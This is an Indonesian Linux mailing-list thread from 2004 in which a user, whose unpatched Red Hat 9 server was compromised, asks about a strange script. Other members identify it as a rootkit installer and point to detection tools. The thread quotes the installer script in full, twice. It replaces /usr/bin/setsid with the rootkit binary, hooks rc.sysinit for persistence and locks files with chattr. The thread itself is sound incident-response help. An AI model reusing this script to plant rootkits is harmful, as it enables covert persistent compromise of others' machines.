Re: [tanya-jawab] nanya script aneh.
iya, sptnya openssh/samba nya dihack. saya pakai redhat 9 yang masih blum di update. baru 2 hari up dah di hack, sedih. trus saya format aja, ganti fedora core 2, langsung saya update sampai kernelnya. asik juga karena gampang mengupdate nya, pakai yum atau up2date. On Tue, 2 Nov 2004 11:16:03 -0500, Iwan Setiawan [EMAIL PROTECTED] wrote: On Monday 01 November 2004 20:20, [EMAIL PROTECTED] wrote: ++ Hati-hati kayaknya ada yg coba pasang rootkit tuh ... seringkali kalo udah berhasil dia ninggal backdoor juga, cek linux anda pakai : chkrootkit http://www.chkrootkit.org/ , dan rootkit hunter http://www.rootkit.nl/ moga belum parah Tambahan: Mungkin script tersebut untuk menjalankan SuckIT atau variannya. Cek sistem apakah perintah-perintah yang ada dalam script sudah dijalankan dan merubah sistem? misal adakah /sbin/hidden, dst. Ini tergantung dari permission dan privilege dari yang menjalankan. Kalo punya tripwire malah lebih menyenangkan, karena bisa tahu mana saja berkas-berkas yang berubah. -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis
Re: [tanya-jawab] nanya script aneh.
ini file apaan ya ? file yang jelas harus dibuang, dan yang lebih penting lagi anda harus cari tau kenapa kok bisa ada file seperti itu di komputer anda. :) -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis
Re: [tanya-jawab] nanya script aneh.
halo, saya heran di linux saya ada folder /var/www/bash. disitu ada beberapa executable, dan ada file script namanya id, isinya: #!/bin/sh echo *** Welcome Kid *** mkdir -p /var/www/bash ; mv /tmp/x /var/www/bash chattr -iau /sbin/init ; mv -f /sbin/init /sbin/hidden cd /var/www/bash/x ; ./inst /dev/null 21 sleep 2 cd /var/www/bash ; ./sk /dev/null chattr -iau /sbin/init rm -rf /sbin/init ; mv -f /sbin/hidden /sbin/init echo *** adding files for reboot ... *** chattr -iau /usr/bin/setsid ; rm -rf /usr/bin/setsid sleep 2 chattr -iau /var/www/bash/sk ; chattr -iau /etc/rc.d/rc.sysinit cp /var/www/bash/sk /usr/bin/setsid echo /usr/bin/setsid /dev/null 21 /etc/rc.d/rc.sysinit chattr +iau /etc/rc.d/rc.sysinit ; echo ftp /etc/ftpusers echo anonymous /etc/ftpusers echo Job with Sk = DONE rm -rf /tmp/x gud.tgz ; cd /var/www/bash ; mkdir ah ; mv /tmp/x ah --- ini file apaan ya ? ++ Hati-hati kayaknya ada yg coba pasang rootkit tuh ... seringkali kalo udah berhasil dia ninggal backdoor juga, cek linux anda pakai : chkrootkit http://www.chkrootkit.org/ , dan rootkit hunter http://www.rootkit.nl/ moga belum parah salam, -rianu- -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis
Re: [tanya-jawab] nanya script aneh.
On Monday 01 November 2004 20:20, [EMAIL PROTECTED] wrote: ++ Hati-hati kayaknya ada yg coba pasang rootkit tuh ... seringkali kalo udah berhasil dia ninggal backdoor juga, cek linux anda pakai : chkrootkit http://www.chkrootkit.org/ , dan rootkit hunter http://www.rootkit.nl/ moga belum parah Tambahan: Mungkin script tersebut untuk menjalankan SuckIT atau variannya. Cek sistem apakah perintah-perintah yang ada dalam script sudah dijalankan dan merubah sistem? misal adakah /sbin/hidden, dst. Ini tergantung dari permission dan privilege dari yang menjalankan. Kalo punya tripwire malah lebih menyenangkan, karena bisa tahu mana saja berkas-berkas yang berubah. Salam manis, _stwn -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis
[tanya-jawab] nanya script aneh.
halo, saya heran di linux saya ada folder /var/www/bash. disitu ada beberapa executable, dan ada file script namanya id, isinya: #!/bin/sh echo *** Welcome Kid *** mkdir -p /var/www/bash ; mv /tmp/x /var/www/bash chattr -iau /sbin/init ; mv -f /sbin/init /sbin/hidden cd /var/www/bash/x ; ./inst /dev/null 21 sleep 2 cd /var/www/bash ; ./sk /dev/null chattr -iau /sbin/init rm -rf /sbin/init ; mv -f /sbin/hidden /sbin/init echo *** adding files for reboot ... *** chattr -iau /usr/bin/setsid ; rm -rf /usr/bin/setsid sleep 2 chattr -iau /var/www/bash/sk ; chattr -iau /etc/rc.d/rc.sysinit cp /var/www/bash/sk /usr/bin/setsid echo /usr/bin/setsid /dev/null 21 /etc/rc.d/rc.sysinit chattr +iau /etc/rc.d/rc.sysinit ; echo ftp /etc/ftpusers echo anonymous /etc/ftpusers echo Job with Sk = DONE rm -rf /tmp/x gud.tgz ; cd /var/www/bash ; mkdir ah ; mv /tmp/x ah --- ini file apaan ya ? thx bantuannya /ilham -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip, FAQ, dan info milis di http://linux.or.id/milis.php Tidak bisa posting? Baca: http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi http://linux.or.id/wiki/index.php?pagename=TataTertibMilis